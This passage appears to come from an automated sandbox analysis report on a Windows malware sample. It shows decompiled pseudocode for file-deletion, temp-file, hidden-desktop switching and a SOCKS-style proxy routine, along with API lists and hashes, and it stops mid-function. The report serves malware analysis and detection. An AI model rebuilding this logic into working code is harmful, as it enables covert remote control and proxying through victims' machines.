Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$FromMessagePointSendTimeout
String ID:
API String ID: 2645164282-0
Opcode ID: f5a80c0cded3bae43f8e9bee253070bf1f75ae18eecc1b85373258387dcfc702
Instruction ID: 974ed6c944f1da488938000a367dba6d063fae83a09b807688668f3bb22a8361
Opcode Fuzzy Hash: f5a80c0cded3bae43f8e9bee253070bf1f75ae18eecc1b85373258387dcfc702
Instruction Fuzzy Hash: 712154322082156BD2109A59BC40EBBB3DCEBC5735F10072AF964E33D0DA69DD0987BA

Uniqueness

Uniqueness Score: -1.00%

Function 0040CDA0, Relevance: 9.1, APIs: 6, Instructions: 71
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CDA0(void* __edx) {
				void* __esi;
				intOrPtr _t9;
				void* _t14;
				intOrPtr _t29;
				void** _t30;
				WCHAR* _t31;
				void* _t32;
				char* _t33;

				_t9 =  *((intOrPtr*)(__edx + 0x14));
				_t33 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(_t9 + 0x1c)) > 0 &&  *((intOrPtr*)(_t9 + 0x14)) > 0x40) {
					_t24 = _t9;
					_t29 =  *((intOrPtr*)(_t9 + 0x14));
					if(_t29 != 0) {
						_t6 = _t29 + 4; // 0x44
						_t32 = HeapAlloc( *0x42e6d4, 0, _t6);
						if(_t32 != 0) {
							E00410820(_t32, _t24, _t29);
							if(E0040EA70() == 0) {
								HeapFree( *0x42e6d4, 0, _t32);
							}
						}
					}
				}
				if( *_t33 != 0) {
					L13:
					return 1;
				} else {
					_t30 = _t33 + 8;
					if(E00419530(_t30) == 0) {
						if(_t30 != 0) {
							_t14 =  *_t30;
							if(_t14 != 0xffffffff) {
								FlushFileBuffers(_t14);
								CloseHandle( *_t30);
								 *_t30 = 0xffffffff;
							}
						}
						_t31 = _t33 + 0x122;
						SetFileAttributesW(_t31, 0x80);
						DeleteFileW(_t31);
						goto L13;
					} else {
						return 0;
					}
				}
			}

0x0040cda0
0x0040cda9
0x0040cdae
0x0040cdb6
0x0040cdb8
0x0040cdbd
0x0040cdc5
0x0040cdd2
0x0040cdd6
0x0040cddb
0x0040cde9
0x0040cdf5
0x0040cdf5
0x0040cde9
0x0040cdd6
0x0040cdbd
0x0040cdff
0x0040ce51
0x0040ce57
0x0040ce01
0x0040ce01
0x0040ce0b
0x0040ce16
0x0040ce18
0x0040ce1d
0x0040ce20
0x0040ce29
0x0040ce2f
0x0040ce2f
0x0040ce1d
0x0040ce3a
0x0040ce41
0x0040ce48
0x00000000
0x0040ce0d
0x0040ce13
0x0040ce13
0x0040ce0b

APIs

HeapAlloc.KERNEL32(?,00000000,00000044), ref: 0040CDCC

Part of subcall function 0040EA70: CreateThread.KERNEL32 ref: 0040EA81
Part of subcall function 0040EA70: CloseHandle.KERNEL32(00000000), ref: 0040EA8C

HeapFree.KERNEL32(?,00000000,00000000,00000000,?,00000040), ref: 0040CDF5
FlushFileBuffers.KERNEL32(00000000), ref: 0040CE20
CloseHandle.KERNEL32(00000000), ref: 0040CE29
SetFileAttributesW.KERNEL32(?,00000080), ref: 0040CE41
DeleteFileW.KERNEL32(?), ref: 0040CE48

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CloseHandleHeap$AllocAttributesBuffersCreateDeleteFlushFreeThread
String ID:
API String ID: 2754212095-0
Opcode ID: ea66a9a5e998ddf0fd8965f4115af4d3df8163aaa9c15997168eaa36abebfb1f
Instruction ID: f58c899b12f25af628a3cd61be3928e08c2706f5e127636c08044a76f0e901a9
Opcode Fuzzy Hash: ea66a9a5e998ddf0fd8965f4115af4d3df8163aaa9c15997168eaa36abebfb1f
Instruction Fuzzy Hash: E211D271601610ABC7249F64ED88B9B7B69EF45761F50023AF940BB2D0C738EC42CBE8

Uniqueness

Uniqueness Score: -1.00%

Function 00418040, Relevance: 9.1, APIs: 6, Instructions: 67
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00418040(signed int __eax, WCHAR* __edx, void** __esi) {
				char _v12;
				intOrPtr _v16;
				long _v20;
				long _v24;
				void* _t14;
				long _t17;
				void* _t18;

				_t34 = __esi;
				asm("sbb ecx, ecx");
				_t14 = CreateFileW(__edx, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
				__esi[2] = _t14;
				if(_t14 == 0xffffffff) {
					L11:
					return 0;
				} else {
					__imp__GetFileSizeEx(_t14,  &_v12);
					if(_t14 == 0 || _v16 != 0) {
						L10:
						CloseHandle(_t34[2]);
						goto L11;
					} else {
						_t17 = _v20;
						__esi[1] = _t17;
						if(_t17 != 0) {
							_t18 = VirtualAlloc(0, _t17, 0x3000, 4);
							 *__esi = _t18;
							if(_t18 == 0) {
								goto L10;
							} else {
								if(ReadFile(__esi[2], _t18, __esi[1],  &_v24, 0) == 0 || _v24 != __esi[1]) {
									VirtualFree( *_t34, 0, 0x8000);
									goto L10;
								} else {
									goto L5;
								}
							}
						} else {
							 *__esi = _t17;
							L5:
							return 1;
						}
					}
				}
			}

0x00418040
0x00418050
0x00418061
0x00418067
0x0041806d
0x004180ec
0x004180f1
0x0041806f
0x00418075
0x0041807d
0x004180e2
0x004180e6
0x00000000
0x00418086
0x00418086
0x0041808a
0x0041808f
0x004180a3
0x004180a9
0x004180ad
0x00000000
0x004180af
0x004180c7
0x004180dc
0x00000000
0x00000000
0x00000000
0x00000000
0x004180c7
0x00418091
0x00418091
0x00418093
0x00418098
0x00418098
0x0041808f
0x0041807d

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,0041D962,?,?,00000000), ref: 00418061
GetFileSizeEx.KERNEL32(00000000,00000000,?,00000000,00000003,00000000,00000000,?,0041D962,?,?,00000000), ref: 00418075
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,00000000), ref: 004180A3
ReadFile.KERNEL32(0041DE01,00000000,00000001,00000000,00000000,?,00000000), ref: 004180BF
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 004180DC
CloseHandle.KERNEL32(0041DE01,?,00000000,00000003,00000000,00000000,?,0041D962,?,?,00000000), ref: 004180E6

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 1974014688-0
Opcode ID: 17091555beb1751a1be79b7621bc65c54d1e0e9260acc6880353fd6f35fc1204
Instruction ID: 84304f4e3ba96eb3429645289d2576c930bc51746f3b1a3cc6250fce95cdf231
Opcode Fuzzy Hash: 17091555beb1751a1be79b7621bc65c54d1e0e9260acc6880353fd6f35fc1204
Instruction Fuzzy Hash: B81196B4600701AFE7249F24CC46F677BE8EB48B00F51C91DF686D62E0EAB4E884CB14

Uniqueness

Uniqueness Score: -1.00%

Function 0041BD41, Relevance: 9.1, APIs: 6, Instructions: 63
synchronizationwindowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041BD41(void* __eax, struct HWND__* _a8, struct tagRECT* _a12, int _a16) {
				int _t21;
				signed int _t22;
				struct HWND__* _t29;
				char* _t43;

				_t29 = _a8;
				if(__eax + 0x42e94b == 0 || WaitForSingleObject( *0x42edbc, 0) == 0) {
					L9:
					return GetUpdateRect(_t29, _a12, _a16);
				} else {
					_t43 = TlsGetValue( *0x42eea4);
					if(_t43 == 0 || _t29 !=  *((intOrPtr*)(_t43 + 4))) {
						goto L9;
					} else {
						if(_a12 != 0) {
							_t4 = _t43 + 0xc; // 0xc
							E00410820( &_a12, _t4, 0x10);
						}
						if(_a16 != 0) {
							_t21 = SaveDC( *(_t43 + 8));
							_t22 = SendMessageW(_t29, 0x14,  *(_t43 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t43 + 0x1c)) =  ~_t22 + 1;
							RestoreDC( *(_t43 + 8), _t21);
						}
						 *_t43 = 1;
						return 1;
					}
				}
			}

0x0041bd48
0x0041bd4d
0x0041bdd8
0x0041bdeb
0x0041bd65
0x0041bd72
0x0041bd76
0x00000000
0x0041bd7d
0x0041bd82
0x0041bd86
0x0041bd8f
0x0041bd8f
0x0041bd99
0x0041bda0
0x0041bdb1
0x0041bdb9
0x0041bdbc
0x0041bdc4
0x0041bdca
0x0041bdcb
0x0041bdd5
0x0041bdd5
0x0041bd76

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 0041BD5B
TlsGetValue.KERNEL32(?), ref: 0041BD6C
SaveDC.GDI32(?), ref: 0041BDA0
SendMessageW.USER32(?,00000014,?,00000000), ref: 0041BDB1
RestoreDC.GDI32(?,00000000), ref: 0041BDC4
GetUpdateRect.USER32 ref: 0041BDE3

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
String ID:
API String ID: 3142230470-0
Opcode ID: 910478eb870fae079cbfc32dede414d7165ddc7d7c678898cf00274ee62d59a4
Instruction ID: 5abc7b75c81bd0c1ec54410e0cf48dd606826a7ea53d08634da016aa3c7a1b20
Opcode Fuzzy Hash: 910478eb870fae079cbfc32dede414d7165ddc7d7c678898cf00274ee62d59a4
Instruction Fuzzy Hash: 511151726003019BD725DB65ED88FDBB7E8EF88701F04891EF185972A0D778E885CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004156D0, Relevance: 9.1, APIs: 6, Instructions: 62
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004156D0(HANDLE* _a4) {
				struct tagMSG _v28;
				long _t9;
				long _t27;

				_t9 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4ff);
				_t27 = _t9;
				if(_t27 == 1) {
					do {
						if(PeekMessageW( &_v28, 0, 0, 0, 1) == 0) {
							goto L6;
						}
						while(_v28.message != 0x12) {
							TranslateMessage( &_v28);
							DispatchMessageW( &_v28);
							if(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
								continue;
							}
							goto L6;
						}
						break;
						L6:
						_t27 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4ff);
					} while (_t27 == 1);
					return _t27;
				}
				return _t9;
			}

0x004156e4
0x004156ea
0x004156ef
0x00415706
0x00415717
0x00000000
0x00000000
0x00415720
0x0041572c
0x00415733
0x00415746
0x00000000
0x00000000
0x00000000
0x00415746
0x00000000
0x00415748
0x0041575e
0x00415760
0x00000000
0x00415769
0x0041576e

APIs

MsgWaitForMultipleObjects.USER32 ref: 004156E4
PeekMessageW.USER32 ref: 00415713
TranslateMessage.USER32(?), ref: 0041572C
DispatchMessageW.USER32 ref: 00415733
PeekMessageW.USER32 ref: 00415742
MsgWaitForMultipleObjects.USER32 ref: 00415758

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$MultipleObjectsPeekWait$DispatchTranslate
String ID:
API String ID: 1800058468-0
Opcode ID: 8a72eda1b7afc94af45fb6cf2009e0871459cc90412e5793c6ef195645c7bdab
Instruction ID: 39ef73abcc481dd9ca0d32de890b917f32e69bb72bca8ecf3a07ed9730486b46
Opcode Fuzzy Hash: 8a72eda1b7afc94af45fb6cf2009e0871459cc90412e5793c6ef195645c7bdab
Instruction Fuzzy Hash: 5711CC72644311FBE320E7689D82FE7B398BBC4B10F540629F764772E0D6B5E8448669

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA70, Relevance: 9.1, APIs: 6, Instructions: 61
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DA70(void* __eax, intOrPtr _a4) {
				short _v524;
				short _v1044;
				void* _v1048;
				void* __edi;
				void* _t20;
				void* _t25;
				void* _t33;
				WCHAR* _t34;

				_t33 = __eax;
				_t25 = 0;
				if(GetTempPathW(0xf6,  &_v524) - 1 <= 0xf5 && GetTempFileNameW( &_v524, L"bc", 0,  &_v1044) != 0) {
					SetFileAttributesW( &_v1044, 0x80);
					if(DeleteFileW( &_v1044) != 0) {
						_t20 = E004162C0( &_v1044, _t33, _a4);
						_t41 = _t20;
						if(_t20 != 0) {
							_t34 =  &_v1044;
							_t25 = E0040DA00(_t34, _t41, _t33, ( &_v1044)[0x216]);
							SetFileAttributesW(_t34, 0x80);
							DeleteFileW(_t34);
						}
					}
				}
				return _t25;
			}

0x0040da7a
0x0040da89
0x0040da97
0x0040dac7
0x0040dad8
0x0040dae8
0x0040daed
0x0040daef
0x0040dafa
0x0040db0b
0x0040db0d
0x0040db12
0x0040db12
0x0040daef
0x0040dad8
0x0040db20

APIs

GetTempPathW.KERNEL32(000000F6,?,?,?,?,00000001), ref: 0040DA8B
GetTempFileNameW.KERNEL32(?,00401780,00000000,?,?,00000001), ref: 0040DAAD
SetFileAttributesW.KERNEL32(?,00000080,?,00000001), ref: 0040DAC7
DeleteFileW.KERNEL32(?,?,00000001), ref: 0040DAD4

Part of subcall function 004162C0: HeapFree.KERNEL32(?,00000000,74B5FBB0,00000000,?,?,00000001), ref: 00416371
Part of subcall function 004162C0: FreeLibrary.KERNEL32(?,?,00000001), ref: 00416385
Part of subcall function 004162C0: HeapDestroy.KERNEL32(00000000,?,00000001), ref: 00416392

Part of subcall function 0040DA00: VirtualFree.KERNEL32(?,00000000,00008000,00000002,?,?,?), ref: 0040DA4D
Part of subcall function 0040DA00: CloseHandle.KERNEL32(?,00000002,?,?,?), ref: 0040DA5C

SetFileAttributesW.KERNEL32(?,00000080,?,?,00000001), ref: 0040DB0D
DeleteFileW.KERNEL32(?,?,00000001), ref: 0040DB12

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Free$AttributesDeleteHeapTemp$CloseDestroyHandleLibraryNamePathVirtual
String ID:
API String ID: 1629315103-0
Opcode ID: 03c559fe1e023223da8d0de7e16b4b3529370fd1a7f6761562c2f73481aa2648
Instruction ID: cce1326d6996a1784566e6d399f037ac32df646e845cc88377a18f5232f401ab
Opcode Fuzzy Hash: 03c559fe1e023223da8d0de7e16b4b3529370fd1a7f6761562c2f73481aa2648
Instruction Fuzzy Hash: D911A0727442456AD620EB65DC41FEB77ACEBC8780F04493EB640A7190DA38E80CC779

Uniqueness

Uniqueness Score: -1.00%

Function 0041C040, Relevance: 9.1, APIs: 6, Instructions: 58
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C040() {
				struct tagMSG _v32;
				signed int _t13;

				SetThreadPriority(GetCurrentThread(), 1);
				SetEvent( *0x42eeac);
				_t13 = GetMessageW( &_v32, 0xffffffff, 0, 0);
				if(_t13 != 0xffffffff) {
					while(_t13 != 0) {
						if(_v32.message ==  *0x42eea8 && _v32.wParam == 0xfffffffc) {
							 *((char*)( *0x42eeb0 + 0x124)) = E0041B6E0( *0x42eeb0 + 0x114,  *0x42eeb0 + 0x114, 0x42eea0, _v32.lParam, 1);
							SetEvent( *0x42eeac);
						}
						_t13 = GetMessageW( &_v32, 0xffffffff, 0, 0);
						if(_t13 != 0xffffffff) {
							continue;
						}
						goto L6;
					}
				}
				L6:
				return _t13 & 0xffffff00 | _t13 == 0x00000000;
			}

0x0041c054
0x0041c066
0x0041c079
0x0041c07e
0x0041c080
0x0041c08e
0x0041c0b8
0x0041c0c4
0x0041c0c4
0x0041c0d1
0x0041c0d6
0x00000000
0x00000000
0x00000000
0x0041c0d6
0x0041c080
0x0041c0d8
0x0041c0e4

APIs

GetCurrentThread.KERNEL32 ref: 0041C04D
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,0041DDE9), ref: 0041C054
SetEvent.KERNEL32(?,?,?,?,?,?,?,0041DDE9), ref: 0041C066
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 0041C079
SetEvent.KERNEL32(?,0042EEA0,?,00000001), ref: 0041C0C4
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 0041C0D1

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: EventMessageThread$CurrentPriority
String ID:
API String ID: 709478964-0
Opcode ID: 14b9f14c41ad5068a75e8facd5baebdd600b9d88a5ebfef25757d0857e53f5e3
Instruction ID: b3764b2c0785421e7a4c9a4fe64593d485a003a013d0d16c67160791eddff067
Opcode Fuzzy Hash: 14b9f14c41ad5068a75e8facd5baebdd600b9d88a5ebfef25757d0857e53f5e3
Instruction Fuzzy Hash: 2011A332640300ABD720DBB99D85BDA7B55AB88770F20072DF520932E0D774E486C79D

Uniqueness

Uniqueness Score: -1.00%

Function 0041A2F0, Relevance: 9.1, APIs: 6, Instructions: 52
threadmemorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A2F0(void* __ecx, struct HDESK__* _a4) {
				void* __edi;
				struct HDESK__* _t4;
				int _t6;
				void* _t13;
				void* _t19;
				void* _t20;

				_t4 = GetThreadDesktop(GetCurrentThreadId());
				_t13 = 0;
				_t20 = E0041A1E0(_t4);
				if(_t20 == 0) {
					L6:
					_t6 = SetThreadDesktop(_a4);
					if(_t6 != 0) {
						goto L8;
					} else {
						return _t6;
					}
				} else {
					_t19 = E0041A1E0(_a4);
					if(_t19 != 0) {
						if(lstrcmpiW(_t20, _t19) == 0) {
							_t13 = 1;
						}
						HeapFree( *0x42e6d4, 0, _t19);
					}
					HeapFree( *0x42e6d4, 0, _t20);
					if(_t13 != 0) {
						L8:
						return 1;
					} else {
						goto L6;
					}
				}
			}

0x0041a2fa
0x0041a302
0x0041a309
0x0041a30d
0x0041a34f
0x0041a354
0x0041a35c
0x00000000
0x0041a361
0x0041a361
0x0041a361
0x0041a30f
0x0041a31f
0x0041a323
0x0041a32f
0x0041a331
0x0041a331
0x0041a33c
0x0041a33c
0x0041a348
0x0041a34d
0x0041a366
0x0041a36c
0x00000000
0x00000000
0x00000000
0x0041a34d

APIs

GetCurrentThreadId.KERNEL32 ref: 0041A2F3
GetThreadDesktop.USER32(00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A2FA

Part of subcall function 0041A1E0: GetUserObjectInformationW.USER32(00000000,00000002,?,00000000,?,00000000), ref: 0041A207
Part of subcall function 0041A1E0: HeapAlloc.KERNEL32(?,00000008,?), ref: 0041A229
Part of subcall function 0041A1E0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,?,?), ref: 0041A243

lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A327
HeapFree.KERNEL32(?,00000000,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A33C
HeapFree.KERNEL32(?,00000000,00000000,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A348
SetThreadDesktop.USER32(?,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A354

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapThread$DesktopFreeInformationObjectUser$AllocCurrentlstrcmpi
String ID:
API String ID: 589007651-0
Opcode ID: 8619d38f70af140a8d443ce01c9244cf01e54c095599268d267555844530ff07
Instruction ID: 91ae4d9f89298637f7c4850ecbaa899cb87559722f449cc8e7fd8bbad95ecfe0
Opcode Fuzzy Hash: 8619d38f70af140a8d443ce01c9244cf01e54c095599268d267555844530ff07
Instruction Fuzzy Hash: BB01623234230567C320A766AD48FAB776DABD5BA1F18443AFA10D7220DA39D851C76E

Uniqueness

Uniqueness Score: -1.00%

Function 00406260, Relevance: 9.0, APIs: 6, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406260(struct HDC__** __esi) {
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t23;

				_t23 = __esi;
				SelectObject( *__esi, __esi[1]);
				DeleteObject(__esi[4]);
				_t9 = __esi[7];
				if(_t9 != 0) {
					HeapFree( *0x42e6d4, 0, _t9);
				}
				_t10 =  *(_t23 + 0x18);
				if(_t10 != 0) {
					HeapFree( *0x42e6d4, 0, _t10);
				}
				_t11 =  *(_t23 + 0x44);
				if(_t11 != 0) {
					HeapFree( *0x42e6d4, 0, _t11);
				}
				return HeapFree( *0x42e6d4, 0, _t23);
			}

0x00406260
0x00406268
0x00406272
0x00406278
0x00406283
0x0040628e
0x0040628e
0x00406290
0x00406295
0x004062a1
0x004062a1
0x004062a3
0x004062a8
0x004062b4
0x004062b4
0x004062c2

APIs

SelectObject.GDI32(?,?), ref: 00406268
DeleteObject.GDI32(?), ref: 00406272
HeapFree.KERNEL32(?,00000000,?,?,?,00000000,00406C72), ref: 0040628E
HeapFree.KERNEL32(?,00000000,?,?,?,00000000,00406C72), ref: 004062A1
HeapFree.KERNEL32(?,00000000,?,?,?,00000000,00406C72), ref: 004062B4
HeapFree.KERNEL32(?,00000000,00000000,?,?,00000000,00406C72), ref: 004062BF

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$Object$DeleteSelect
String ID:
API String ID: 420294138-0
Opcode ID: 56819ad5531f2e81198f249482baccdba279cf3b0509d61ed396d62f4abd1f2a
Instruction ID: 02b928c4a94aabe9458f7401b4cdfdb2956d8a2c385be4e98722b0d069f914ad
Opcode Fuzzy Hash: 56819ad5531f2e81198f249482baccdba279cf3b0509d61ed396d62f4abd1f2a
Instruction Fuzzy Hash: A0F07975300600ABD634EB6AED84F27B3ACAB98700F95492DBA45D76A0C674FC018B68

Uniqueness

Uniqueness Score: -1.00%

Function 00426790, Relevance: 9.0, APIs: 6, Instructions: 36
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00426790() {
				void* _t2;
				void* _t3;
				void* _t4;
				long _t5;
				void* _t6;
				void* _t7;
				void* _t8;

				if(( *0x42e8f8 & 0x00000004) != 0) {
					_t3 =  *0x42eebc;
					if(_t3 != 0) {
						DeleteObject(_t3);
					}
					_t4 =  *0x42eeac;
					if(_t4 != 0) {
						CloseHandle(_t4);
					}
					_t5 =  *0x42eea4;
					if(_t5 != 0xffffffff) {
						TlsFree(_t5);
					}
					_t6 =  *0x42eeb4;
					if(_t6 != 0) {
						CloseHandle(_t6);
					}
					_t7 =  *0x42eeb0;
					if(_t7 != 0) {
						UnmapViewOfFile(_t7);
					}
					_t8 =  *0x42eea0;
					if(_t8 != 0) {
						_t8 = CloseHandle(_t8);
					}
					return _t8;
				}
				return _t2;
			}

0x00426797
0x00426799
0x004267a0
0x004267a3
0x004267a3
0x004267a9
0x004267b7
0x004267ba
0x004267ba
0x004267bc
0x004267c4
0x004267c7
0x004267c7
0x004267cd
0x004267d4
0x004267d7
0x004267d7
0x004267d9
0x004267e0
0x004267e3
0x004267e3
0x004267e9
0x004267f0
0x004267f3
0x004267f3
0x00000000
0x004267f5
0x004267f6

APIs

DeleteObject.GDI32(?), ref: 004267A3
CloseHandle.KERNEL32(?,?,0041DDF0), ref: 004267BA
TlsFree.KERNEL32(?,?,0041DDF0), ref: 004267C7
CloseHandle.KERNEL32(?,?,0041DDF0), ref: 004267D7
UnmapViewOfFile.KERNEL32(?,?,0041DDF0), ref: 004267E3
CloseHandle.KERNEL32(?,?,0041DDF0), ref: 004267F3

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$DeleteFileFreeObjectUnmapView
String ID:
API String ID: 356342017-0
Opcode ID: 72ae9c72467b55cf1f3f3ed2cefb1c8480e9cc6d8ae53495578fe64ef9bbd4ed
Instruction ID: f98a78428e86270f867a08fed1b839b1ba65c536a329dc7881f91f5ff442469f
Opcode Fuzzy Hash: 72ae9c72467b55cf1f3f3ed2cefb1c8480e9cc6d8ae53495578fe64ef9bbd4ed
Instruction Fuzzy Hash: 6DF0AF747002615BDB209B7ABD88B5736AC6B44754796443EA910E33A0D7B8DC42CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00409910, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 247
networkCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00409910(intOrPtr _a4) {
				char _v8;
				char _v256;
				signed short _v268;
				signed int _v280;
				short _v282;
				char _v284;
				signed int _v289;
				short _v291;
				char _v292;
				short _v296;
				short _v298;
				char _v299;
				signed int _v300;
				signed int _v304;
				char _v305;
				char _v306;
				intOrPtr _v308;
				intOrPtr _v320;
				char _v322;
				intOrPtr _v332;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t67;
				signed int _t68;
				void* _t86;
				void* _t90;
				intOrPtr _t113;
				signed int _t117;
				void* _t140;
				void* _t141;
				void* _t143;
				intOrPtr _t144;
				intOrPtr _t147;
				intOrPtr _t150;
				void* _t151;

				_t151 =  &_v296;
				_t113 = _a4;
				_t67 =  &_v292;
				_v292 = 0x80;
				__imp__#6(_t113,  &_v256, _t67);
				if(_t67 != 0) {
					_t68 = 0;
				} else {
					_t68 = _v268 & 0x0000ffff;
				}
				_t149 = 0 | _t68 == 0x00000017;
				_v300 = _t68 == 0x17;
				if(E00414B90(7, _t113, 0,  &_v292) == 0) {
					L8:
					return 0;
				} else {
					if(E00414B90(1, _t113, 0,  &_v305) == 0) {
						goto L8;
					} else {
						while(_v305 != 0) {
							if(E00414B90(1, _t113, 0,  &_v305) != 0) {
								continue;
							} else {
								goto L8;
							}
							goto L47;
						}
						_t117 = _v289;
						_t80 = ((_t117 & 0x00ff0000 | _t117 >> 0x00000010) >> 0x00000008 | (_t117 & 0x0000ff00 | _t117 << 0x00000010) << 0x00000008) - 1;
						_v306 = 0x5a;
						if(((_t117 & 0x00ff0000 | _t117 >> 0x00000010) >> 0x00000008 | (_t117 & 0x0000ff00 | _t117 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
							L23:
							_v305 = 1;
							if(_v306 != 0x5a) {
								L46:
								_v296 = 0;
								_v298 = 0;
								_v300 = 0;
								_v299 = _v306;
								__imp__#19(_t113,  &_v300, 8, 0);
								return 0xbadbad;
							} else {
								E00410870(_t80,  &_v284, 0, 0x10);
								_v296 = 2;
								_t86 = (_v304 & 0x000000ff) - 1;
								if(_t86 == 0) {
									_v282 = _v291;
									_v280 = _v289;
									_t143 = E00414D20( &_v284);
									if(_t143 == 0xffffffff) {
										goto L26;
									} else {
										E004152F0();
										_t90 = E00409870(_t143, _t113, 0x5a, _t149);
										if(_t90 != 1) {
											if(_t90 != 0xffffffff) {
												_v305 = 0;
											} else {
												_v306 = 0x5b;
											}
										} else {
											_push(_t143);
											_t90 = E004150D0(_t113);
										}
										E004152D0(_t90, _t143);
										if(_v305 != 1 || _v306 == 0x5a) {
											goto L37;
										} else {
											goto L46;
										}
									}
								} else {
									if(_t86 == 1) {
										_t144 = E00414EE0( &_v284, 1);
										_v308 = _t144;
										if(_t144 == 0xffffffff) {
											goto L26;
										} else {
											_t140 = E00409870(_t94, _t113, 0x5a, _t149);
											if(_t140 != 1) {
												L34:
												E004152D0(_t95, _t144);
												if(_t140 == 0xffffffff) {
													goto L26;
												} else {
													if(_t140 != 1) {
